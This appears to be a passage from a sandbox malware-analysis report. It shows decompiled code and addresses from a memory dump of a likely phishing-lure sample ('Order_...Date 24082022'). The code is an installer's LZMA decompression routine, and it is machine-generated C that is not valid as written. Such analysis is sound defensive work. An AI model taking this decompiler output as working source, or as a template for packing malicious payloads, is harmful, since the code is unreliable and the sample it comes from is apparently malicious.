													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L117:
														 *((intOrPtr*)(_t540 - 0x54)) = _t533;
														goto L118;
													}
												} else {
													__eax =  *(__ebp - 0x28);
													goto L86;
												}
												while(1) {
													L117:
													 *((intOrPtr*)(_t540 - 0x54)) = _t533;
													goto L118;
												}
											case 0xb:
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L86:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L87:
												__eax =  *(__ebp - 4);
												 *((intOrPtr*)(__ebp - 0x80)) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												L67:
												_t533 =  *((intOrPtr*)(_t540 - 0x58));
												 *(_t540 - 0x84) = 0x12;
												while(1) {
													L117:
													 *((intOrPtr*)(_t540 - 0x54)) = _t533;
													goto L118;
												}
											case 0xc:
												L88:
												while( *((intOrPtr*)(__ebp - 0x6c)) != 0) {
													__ecx =  *(__ebp - 0x70);
													__eax =  *(__ebp - 0xc);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
													__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
													 *((intOrPtr*)(__ebp - 0x6c)) =  *((intOrPtr*)(__ebp - 0x6c)) - 1;
													 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
													 *(__ebp - 0x70) =  *(__ebp - 0x70) + 1;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
													__eax =  *(__ebp - 0x2c);
													while(1) {
														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
														if( *(__ebp - 0x48) <= 0) {
															break;
														}
														__ecx =  *(__ebp - 0xc);
														__ebx = __ebx + __ebx;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
														 *(__ebp - 0x44) = __ebx;
														if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
															__ecx =  *(__ebp - 0x10);
															 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
															__ebx = __ebx | 0x00000001;
															 *(__ebp - 0x44) = __ebx;
														}
														if( *(__ebp - 0x10) >= 0x1000000) {
															continue;
														} else {
															goto L88;
														}
														goto L140;
													}
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													while(1) {
														__eax =  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															break;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														if( *(__ebp - 0x10) >= 0x1000000) {
															L100:
															 *(__ebp - 0x48) =  *(__ebp - 0x48) + 1;
															continue;
														} else {
															if( *((intOrPtr*)(__ebp - 0x6c)) == 0) {
																 *((intOrPtr*)(__ebp - 0x88)) = 0x10;
																goto L138;
															} else {
																__ecx =  *(__ebp - 0x70);
																__eax =  *(__ebp - 0xc);
																 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
																__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
																 *((intOrPtr*)(__ebp - 0x6c)) =  *((intOrPtr*)(__ebp - 0x6c)) - 1;
																 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																 *(__ebp - 0x70) =  *(__ebp - 0x70) + 1;
																 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																goto L100;
															}
														}
														goto L140;
													}
													 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + __ebx;
													 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + 1;
													__eax =  *(__ebp - 0x2c);
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L138;
													} else {
														if(__eax >  *(__ebp - 0x60)) {
															goto L139;
														} else {
															 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
															__eax =  *(__ebp - 0x30);
															 *(__ebp - 0x60) =  *(__ebp - 0x60) +  *(__ebp - 0x30);
															while( *((intOrPtr*)(__ebp - 0x64)) != 0) {
																__eax =  *(__ebp - 0x14);
																__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
																if(__eax >=  *(__ebp - 0x74)) {
																	__eax = __eax +  *(__ebp - 0x74);
																}
																__edx =  *(__ebp - 8);
																__cl =  *(__eax + __edx);
																__eax =  *(__ebp - 0x14);
																 *(__ebp - 0x5c) = __cl;
																 *(__eax + __edx) = __cl;
																__eax = __eax + 1;
																__edx = 0;
																_t395 = __eax %  *(__ebp - 0x74);
																__eax = __eax /  *(__ebp - 0x74);
																__edx = _t395;
																__eax =  *(__ebp - 0x68);
																 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
																 *((intOrPtr*)(__ebp - 0x64)) =  *((intOrPtr*)(__ebp - 0x64)) - 1;
																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																 *( *(__ebp - 0x68)) = __cl;
																 *(__ebp - 0x14) = _t395;
																if( *(__ebp - 0x30) > 0) {
																	continue;
																} else {
																	goto L78;
																}
																goto L140;
															}
															 *((intOrPtr*)(__ebp - 0x88)) = 0x1c;
															goto L138;
														}
													}
													goto L140;
												}
												 *((intOrPtr*)(__ebp - 0x88)) = 0xc;
												goto L138;
											case 0xd:
												L37:
												if( *((intOrPtr*)(__ebp - 0x6c)) == 0) {
													 *((intOrPtr*)(__ebp - 0x88)) = 0xd;
													goto L138;
												} else {
													__ecx =  *(__ebp - 0x70);
													__eax =  *(__ebp - 0xc);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
													__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
													 *((intOrPtr*)(__ebp - 0x6c)) =  *((intOrPtr*)(__ebp - 0x6c)) - 1;
													 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
													 *(__ebp - 0x70) =  *(__ebp - 0x70) + 1;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
													L39:
													__eax =  *(__ebp - 0x40);
													if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
														while(__ebx < 0x100) {
															__eax =  *(__ebp - 0x58);
															__edx = __ebx + __ebx;
															__ecx =  *(__ebp - 0x10);
															__esi = __edx + __eax;
															__ecx =  *(__ebp - 0x10) >> 0xb;
															__ax =  *__esi;
															 *(__ebp - 0x54) = __esi;
															__edi = __ax & 0x0000ffff;
															__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
															if( *(__ebp - 0xc) >= __ecx) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
																 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
																__cx = __ax;
																_t170 = __edx + 1; // 0x1
																__ebx = _t170;
																__cx = __ax >> 5;
																__eax = __eax - __ecx;
																 *__esi = __ax;
															} else {
																 *(__ebp - 0x10) = __ecx;
																0x800 = 0x800 - __edi;
																0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
																__ebx = __ebx + __ebx;
																 *__esi = __cx;
															}
															 *(__ebp - 0x44) = __ebx;
															if( *(__ebp - 0x10) >= 0x1000000) {
																continue;
															} else {
																if( *((intOrPtr*)(__ebp - 0x6c)) == 0) {
																	 *((intOrPtr*)(__ebp - 0x88)) = 0xe;
																	goto L138;
																} else {
																	__ecx =  *(__ebp - 0x70);
																	__eax =  *(__ebp - 0xc);
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
																	__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
																	 *((intOrPtr*)(__ebp - 0x6c)) =  *((intOrPtr*)(__ebp - 0x6c)) - 1;
																	 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																	 *(__ebp - 0x70) =  *(__ebp - 0x70) + 1;
																	 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																	continue;
																}
															}
															goto L140;
														}
														goto L54;
													} else {
														if(__ebx >= 0x100) {
															L54:
															 *(__ebp - 0x34) =  *(__ebp - 0x34) & 0x00000000;
															L55:
															__al =  *(__ebp - 0x44);
															 *(__ebp - 0x5c) =  *(__ebp - 0x44);
															if( *((intOrPtr*)(__ebp - 0x64)) == 0) {
																 *((intOrPtr*)(__ebp - 0x88)) = 0x1a;
																goto L138;
															} else {
																__ecx =  *(__ebp - 0x68);
																__al =  *(__ebp - 0x5c);
																__edx =  *(__ebp - 8);
																 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
																 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
																 *((intOrPtr*)(__ebp - 0x64)) =  *((intOrPtr*)(__ebp - 0x64)) - 1;
																 *( *(__ebp - 0x68)) = __al;
																__ecx =  *(__ebp - 0x14);
																 *(__ecx +  *(__ebp - 8)) = __al;
																__eax = __ecx + 1;
																__edx = 0;
																_t192 = __eax %  *(__ebp - 0x74);
																__eax = __eax /  *(__ebp - 0x74);
																__edx = _t192;
																L77:
																 *(__ebp - 0x14) = __edx;
																L78:
																 *((intOrPtr*)(__ebp - 0x88)) = 2;
																goto L1;
															}
														} else {
															L41:
															__eax =  *(__ebp - 0x5b) & 0x000000ff;
															 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
															__ecx =  *(__ebp - 0x58);
															__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
															 *(__ebp - 0x48) = __eax;
															__eax = __eax + 1;
															__eax = __eax << 8;
															__eax = __eax + __ebx;
															__esi =  *(__ebp - 0x58) + __eax * 2;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
															__ax =  *__esi;
															 *(__ebp - 0x54) = __esi;
															__edx = __ax & 0x0000ffff;
															__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
															if( *(__ebp - 0xc) >= __ecx) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
																 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
																__cx = __ax;
																 *(__ebp - 0x40) = 1;
																__cx = __ax >> 5;
																__eax = __eax - __ecx;
																__ebx = __ebx + __ebx + 1;
																 *__esi = __ax;
															} else {
																 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
																 *(__ebp - 0x10) = __ecx;
																0x800 = 0x800 - __edx;
																0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
																__ebx = __ebx + __ebx;
																 *__esi = __cx;
															}
															 *(__ebp - 0x44) = __ebx;
															if( *(__ebp - 0x10) >= 0x1000000) {
																goto L39;
															} else {
																goto L37;
															}
														}
													}
												}
												goto L140;
										}
									}
									L139:
									_t462 = _t461 | 0xffffffff;
								} else {
									L122:
									if( *((intOrPtr*)(_t540 - 0x6c)) == 0) {
										 *(_t540 - 0x88) = 5;
										L138:
										_t495 = 0x22;
										memcpy( *(_t540 - 0x90), _t540 - 0x88, _t495 << 2);
										_t462 = 0;
									} else {
										 *(_t540 - 0x10) =  *(_t540 - 0x10) << 8;
										 *((intOrPtr*)(_t540 - 0x6c)) =  *((intOrPtr*)(_t540 - 0x6c)) - 1;
										 *(_t540 - 0x70) =  &(( *(_t540 - 0x70))[1]);
										 *(_t540 - 0xc) =  *(_t540 - 0xc) << 0x00000008 |  *( *(_t540 - 0x70)) & 0x000000ff;
										goto L124;
									}
								}
								L140:
								return _t462;
							}
						}
					}
					L117:
					 *((intOrPtr*)(_t540 - 0x54)) = _t533;
					goto L118;
				}
			}

0x00000000
0x004069c4
0x004069c4
0x004069c8
0x004069e9
0x004069f0
0x004069f6
0x004069fc
0x00406a0e
0x00406a19
0x00000000
0x004069ca
0x004069d0
0x00406d91
0x00406d91
0x00406d91
0x00406d94
0x00406d94
0x00406d94
0x00406d9a
0x00406da0
0x00406da6
0x00406dc0
0x00406dc3
0x00406dc9
0x00406dd6
0x00406da8
0x00406da8
0x00406db7
0x00406dbb
0x00406dbb
0x00406dd9
0x00406de0
0x00406e07
0x00406e07
0x00406e0d
0x004065a9
0x004065a9
0x004065a9
0x004065b2
0x00000000
0x00000000
0x004065b8
0x00000000
0x004065c3
0x00000000
0x004065c9
0x004065cc
0x004065cf
0x004065d2
0x004065d6
0x00000000
0x004065dc
0x004065dc
0x004065df
0x004065e1
0x004065e2
0x004065e5
0x004065e7
0x004065e8
0x004065ea
0x004065ed
0x004065f2
0x004065f7
0x00406600
0x00406613
0x00406616
0x00406622
0x0040664a
0x0040664c
0x0040664e
0x00406651
0x00406652
0x00406652
0x0040664e
0x0040665a
0x0040665e
0x00000000
0x00406624
0x00406628
0x0040662d
0x0040662d
0x00406636
0x0040663e
0x00406641
0x00000000
0x00406647
0x00406647
0x00000000
0x00406647
0x00406641
0x00406622
0x004065d6
0x00000000
0x00000000
0x00406664
0x00406668
0x00406f14
0x00000000
0x0040666e
0x00406671
0x00406681
0x00406684
0x00406687
0x0040668a
0x0040668e
0x00000000
0x00406690
0x00406690
0x00406696
0x004066c0
0x004066c6
0x004066cd
0x00000000
0x00406698
0x0040669c
0x0040669f
0x004066a4
0x004066a4
0x004066af
0x004066b7
0x004066ba
0x00000000
0x00000000
0x00000000
0x00000000
0x004066ba
0x00406696
0x0040668e
0x00000000
0x00000000
0x004066ff
0x00406705
0x00406708
0x00406715
0x0040671d
0x00000000
0x00000000
0x004066d4
0x004066d8
0x00406f23
0x00000000
0x004066de
0x004066e4
0x004066ef
0x004066f2
0x004066f5
0x004066f8
0x004066fd
0x00000000
0x00000000
0x00000000
0x00000000
0x004066fd
0x00000000
0x00000000
0x00406d94
0x00406d94
0x00406d9a
0x00406da0
0x00406da6
0x00406dc0
0x00406dc3
0x00406dc9
0x00406dd6
0x00406da8
0x00406da8
0x00406db7
0x00406dbb
0x00406dbb
0x00000000
0x00000000
0x00000000
0x00000000
0x00406725
0x0040672a
0x0040679b
0x0040679e
0x004067a1
0x004067a8
0x004067b2
0x00000000
0x0040672c
0x0040672c
0x00406730
0x00406733
0x00406735
0x00406738
0x0040673b
0x0040673d
0x00406740
0x00406742
0x00406747
0x00406751
0x00406758
0x0040675b
0x00406766
0x0040676e
0x00406768
0x00406768
0x00406768
0x0040675d
0x0040675d
0x0040675d
0x00406775
0x00406793
0x00406795
0x00406968
0x00406968
0x0040696b
0x0040696e
0x00406971
0x00406974
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406986
0x0040699e
0x004069a1
0x004069a4
0x004069a7
0x004069a7
0x004069aa
0x004069ae
0x004069b0
0x00406988
0x00406988
0x00406990
0x00406995
0x00406997
0x00406999
0x00406999
0x004069ba
0x004069bd
0x00000000
0x004069bf
0x0040693f
0x00406f47
0x00000000
0x00406945
0x00406945
0x00406948
0x0040694b
0x0040694f
0x00406952
0x00406958
0x0040695a
0x0040695d
0x00000000
0x0040695d
0x0040693f
0x00000000
0x00406960
0x00406960
0x00000000
0x00406777
0x00406777
0x0040677a
0x00406780
0x00406782
0x00406782
0x00406785
0x00406788
0x0040678a
0x0040678b
0x0040678e
0x00000000
0x0040678e
0x00406775
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a32
0x00406a55
0x00406a58
0x00406a5b
0x00406a65
0x00406a34
0x00406a34
0x00406a37
0x00406a3a
0x00406a3d
0x00406a4a
0x00406a4d
0x00406a4d
0x00000000
0x00000000
0x00406a75
0x00000000
0x00406a7b
0x00406a7f
0x00000000
0x00406a85
0x00406a8b
0x00406a8e
0x00406a92
0x00406a99
0x00406f5f
0x00000000
0x00406a9f
0x00406a9f
0x00406aa2
0x00406aa8
0x00406aaa
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abd
0x00406abf
0x00406abf
0x00406abf
0x00406ac2
0x00406ac5
0x00406ac8
0x00406acb
0x00406ace
0x00000000
0x00406ace
0x00406a99
0x00406a7f
0x00000000
0x00000000
0x00406ae6
0x00406aed
0x00406af0
0x00406af3
0x00406afd
0x00406d91
0x00406d91
0x00406d91
0x00000000
0x00406d91
0x00406ae8
0x00406ae8
0x00000000
0x00406ae8
0x00406d91
0x00406d91
0x00406d91
0x00000000
0x00406d91
0x00000000
0x00406b0d
0x00406b14
0x00406b17
0x00406b1a
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b1d
0x00406b20
0x00406b23
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2c
0x00406b2f
0x00406b36
0x00406b3b
0x00406a1c
0x00406a1c
0x00406a1f
0x00406d91
0x00406d91
0x00406d91
0x00000000
0x00406d91
0x00000000
0x00000000
0x00406bc9
0x00406bd3
0x00406bd6
0x00406bd9
0x00406bdd
0x00406be0
0x00406be6
0x00406be8
0x00406beb
0x00406bee
0x00406bf1
0x00406bf1
0x00406bf8
0x00000000
0x00000000
0x00406bfa
0x00406bfd
0x00406bff
0x00406c05
0x00406c08
0x00406c0a
0x00406c0d
0x00406c10
0x00406c13
0x00406c13
0x00406c1d
0x00000000
0x00406c1f
0x00000000
0x00406c1f
0x00000000
0x00406c1d
0x00406c24
0x00406c26
0x00406c2d
0x00406c30
0x00406c33
0x00406c38
0x00406c3a
0x00406c3d
0x00406c44
0x00406c47
0x00406c74
0x00406c74
0x00406c7a
0x00000000
0x00000000
0x00406c7c
0x00406c82
0x00406c85
0x00406c88
0x00406c8b
0x00406c8e
0x00406c91
0x00406c94
0x00406c97
0x00406c9d
0x00406cb6
0x00406cb8
0x00406cbb
0x00406cbc
0x00406cbf
0x00406cc1
0x00406cc4
0x00406cc6
0x00406cc8
0x00406ccb
0x00406ccd
0x00406cd0
0x00406cd4
0x00406cd6
0x00406cd7
0x00406cda
0x00406cdd
0x00406c9f
0x00406c9f
0x00406ca7
0x00406cac
0x00406cae
0x00406cb1
0x00406cb1
0x00406ce7
0x00406c71
0x00406c71
0x00000000
0x00406ce9
0x00406c50
0x00406f77
0x00000000
0x00406c56
0x00406c56
0x00406c59
0x00406c5c
0x00406c60
0x00406c63
0x00406c69
0x00406c6b
0x00406c6e
0x00000000
0x00406c6e
0x00406c50
0x00000000
0x00406ce7
0x00406cee
0x00406cf1
0x00406cf4
0x00406cf9
0x00406f83
0x00000000
0x00406cff
0x00406d02
0x00000000
0x00406d08
0x00406d08
0x00406d0c
0x00406d0f
0x00406d12
0x00406d1c
0x00406d1f
0x00406d25
0x00406d27
0x00406d27
0x00406d2a
0x00406d2d
0x00406d30
0x00406d33
0x00406d36
0x00406d39
0x00406d3a
0x00406d3c
0x00406d3c
0x00406d3c
0x00406d3f
0x00406d42
0x00406d45
0x00406d48
0x00406d4f
0x00406d51
0x00406d54
0x00000000
0x00406d56
0x00000000
0x00406d56
0x00000000
0x00406d54
0x00406f89
0x00000000
0x00406f89
0x00406d02
0x00000000
0x00406cf9
0x00406f6b
0x00000000
0x00000000
0x004067be
0x004067c2
0x00406f2f
0x00000000
0x004067c8
0x004067c8
0x004067cb
0x004067ce
0x004067d2
0x004067d5
0x004067db
0x004067dd
0x004067e0
0x004067e3
0x004067e3
0x004067e9
0x0040689c
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b0
0x004068b3
0x004068b6
0x004068b9
0x004068bc
0x004068c2
0x004068da
0x004068dd
0x004068e0
0x004068e3
0x004068e3
0x004068e6
0x004068ea
0x004068ec
0x004068c4
0x004068c4
0x004068cc
0x004068d1
0x004068d3
0x004068d5
0x004068d5
0x004068f6
0x004068f9
0x00000000
0x004068fb
0x0040687b
0x00406f3b
0x00000000
0x00406881
0x00406881
0x00406884
0x00406887
0x0040688b
0x0040688e
0x00406894
0x00406896
0x00406899
0x00000000
0x00406899
0x0040687b
0x00000000
0x004068f9
0x00000000
0x004067ef
0x004067f5
0x00406900
0x00406900
0x00406904
0x00406904
0x00406907
0x0040690e
0x00406f53
0x00000000
0x00406914
0x00406914
0x00406917
0x0040691a
0x0040691d
0x00406920
0x00406923
0x00406926
0x00406928
0x0040692b
0x0040692e
0x00406931
0x00406933
0x00406933
0x00406933
0x00406ad0
0x00406ad0
0x00406ad3
0x00406ad3
0x00000000
0x00406ad3
0x004067fb
0x004067fb
0x004067fb
0x004067ff
0x00406802
0x00406805
0x00406808
0x0040680b
0x0040680c
0x0040680f
0x00406811
0x00406817
0x0040681a
0x0040681d
0x00406820
0x00406823
0x00406829
0x00406845
0x00406848
0x0040684b
0x0040684e
0x00406855
0x00406859
0x0040685b
0x0040685f
0x0040682b
0x0040682b
0x0040682f
0x00406837
0x0040683c
0x0040683e
0x00406840
0x00406840
0x00406869
0x0040686c
0x00000000
0x00406872
0x00000000
0x00406872
0x0040686c
0x004067f5
0x004067e9
0x00000000
0x00000000
0x004065b8
0x00406fc0
0x00406fc0
0x00406de2
0x00406de2
0x00406de6
0x00406f95
0x00406fab
0x00406fb3
0x00406fba
0x00406fbc
0x00406dec
0x00406df2
0x00406df9
0x00406e01
0x00406e04
0x00000000
0x00406e04
0x00406de6
0x00406fc3
0x00406fc7
0x00406fc7
0x00406d94
0x00406d91
0x00406d91
0x00406d91
0x00000000
0x00406d91

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6ce5af891e87e3449ce1a2b8efcbaa2a3983e7e126d00aa5b1ca20c5284b7a8
Instruction ID: 20aa67b2f9945943e29b5428d9247f38e2249d0fc5fe98f3e4ff2a84f3334865
Opcode Fuzzy Hash: f6ce5af891e87e3449ce1a2b8efcbaa2a3983e7e126d00aa5b1ca20c5284b7a8
Instruction Fuzzy Hash: 17712271E00229DBDF24CFA8C8447ADBBB1FF44305F15846AE856BB280C7395996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406AE2 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406AE2(void* __ebx) {
				unsigned short _t449;
				signed int _t450;
				void _t451;
				signed int _t452;
				signed int _t453;
				signed int _t484;
				signed int _t487;
				signed int _t508;
				signed int* _t525;
				void* _t532;

				L0:
				while(1) {
					L0:
					if( *(_t532 - 0x40) != 0) {
						 *(_t532 - 0x84) = 0xb;
						_t525 =  *(_t532 - 4) + 0x1c8 +  *(_t532 - 0x38) * 2;
					} else {
						__eax =  *(__ebp - 0x28);
						L86:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L87:
						__eax =  *(__ebp - 4);
						 *((intOrPtr*)(__ebp - 0x80)) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L68:
						 *((intOrPtr*)(__ebp - 0x84)) = 0x12;
						while(1) {
							L117:
							 *(_t532 - 0x54) = _t525;
							while(1) {
								L118:
								_t449 =  *_t525;
								_t508 = _t449 & 0x0000ffff;
								_t484 = ( *(_t532 - 0x10) >> 0xb) * _t508;
								if( *(_t532 - 0xc) >= _t484) {
									 *(_t532 - 0x10) =  *(_t532 - 0x10) - _t484;
									 *(_t532 - 0xc) =  *(_t532 - 0xc) - _t484;
									 *(_t532 - 0x40) = 1;
									_t450 = _t449 - (_t449 >> 5);
									 *_t525 = _t450;
								} else {
									 *(_t532 - 0x10) = _t484;
									 *(_t532 - 0x40) =  *(_t532 - 0x40) & 0x00000000;
									 *_t525 = (0x800 - _t508 >> 5) + _t449;
								}
								L121:
								if( *(_t532 - 0x10) >= 0x1000000) {
									L124:
									_t451 =  *(_t532 - 0x84);
									 *(_t532 - 0x88) = _t451;
									while(1) {
										L1:
										_t452 =  *(_t532 - 0x88);
										if(_t452 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t452 * 4 +  &M00406FC8))) {
											case 0:
												if( *(_t532 - 0x6c) == 0) {
													goto L138;
												} else {
													 *(_t532 - 0x6c) =  *(_t532 - 0x6c) - 1;
													 *(_t532 - 0x70) =  &(( *(_t532 - 0x70))[1]);
													_t452 =  *( *(_t532 - 0x70));
													if(_t452 > 0xe1) {
														goto L139;
													} else {
														_t456 = _t452 & 0x000000ff;
														_push(0x2d);
														asm("cdq");
														_pop(_t489);
														_push(9);
														_pop(_t490);
														_t528 = _t456 / _t489;
														_t458 = _t456 % _t489 & 0x000000ff;
														asm("cdq");
														_t523 = _t458 % _t490 & 0x000000ff;
														 *(_t532 - 0x3c) = _t523;
														 *(_t532 - 0x1c) = (1 << _t528) - 1;
														 *((intOrPtr*)(_t532 - 0x18)) = (1 << _t458 / _t490) - 1;
														_t531 = (0x300 << _t523 + _t528) + 0x736;
														if(0x600 ==  *((intOrPtr*)(_t532 - 0x78))) {
															L10:
															if(_t531 != 0) {
																do {
																	_t531 = _t531 - 1;
																	 *((short*)( *(_t532 - 4) + _t531 * 2)) = 0x400;
																} while (_t531 != 0);
															}
															 *(_t532 - 0x48) =  *(_t532 - 0x48) & 0x00000000;
															 *(_t532 - 0x40) =  *(_t532 - 0x40) & 0x00000000;
															goto L15;
														} else {
															if( *(_t532 - 4) != 0) {
																GlobalFree( *(_t532 - 4));
															}
															_t452 = GlobalAlloc(0x40, 0x600); // executed
															 *(_t532 - 4) = _t452;
															if(_t452 == 0) {
																goto L139;
															} else {
																 *((intOrPtr*)(_t532 - 0x78)) = 0x600;
																goto L10;
															}
														}
													}
												}
												goto L140;
											case 1:
												L13:
												__eflags =  *(_t532 - 0x6c);
												if( *(_t532 - 0x6c) == 0) {
													 *(_t532 - 0x88) = 1;
													goto L138;
												} else {
													 *(_t532 - 0x6c) =  *(_t532 - 0x6c) - 1;
													 *(_t532 - 0x40) =  *(_t532 - 0x40) | ( *( *(_t532 - 0x70)) & 0x000000ff) <<  *(_t532 - 0x48) << 0x00000003;
													 *(_t532 - 0x70) =  &(( *(_t532 - 0x70))[1]);
													_t45 = _t532 - 0x48;
													 *_t45 =  *(_t532 - 0x48) + 1;
													__eflags =  *_t45;
													L15:
													if( *(_t532 - 0x48) < 4) {
														goto L13;
													} else {
														_t464 =  *(_t532 - 0x40);
														if(_t464 ==  *(_t532 - 0x74)) {
															L20:
															 *(_t532 - 0x48) = 5;
															 *( *(_t532 - 8) +  *(_t532 - 0x74) - 1) =  *( *(_t532 - 8) +  *(_t532 - 0x74) - 1) & 0x00000000;
															goto L23;
														} else {
															 *(_t532 - 0x74) = _t464;
															if( *(_t532 - 8) != 0) {
																GlobalFree( *(_t532 - 8));
															}
															_t452 = GlobalAlloc(0x40,  *(_t532 - 0x40)); // executed
															 *(_t532 - 8) = _t452;
															if(_t452 == 0) {
																goto L139;
															} else {
																goto L20;
															}
														}
													}
												}
												goto L140;
											case 2:
												L24:
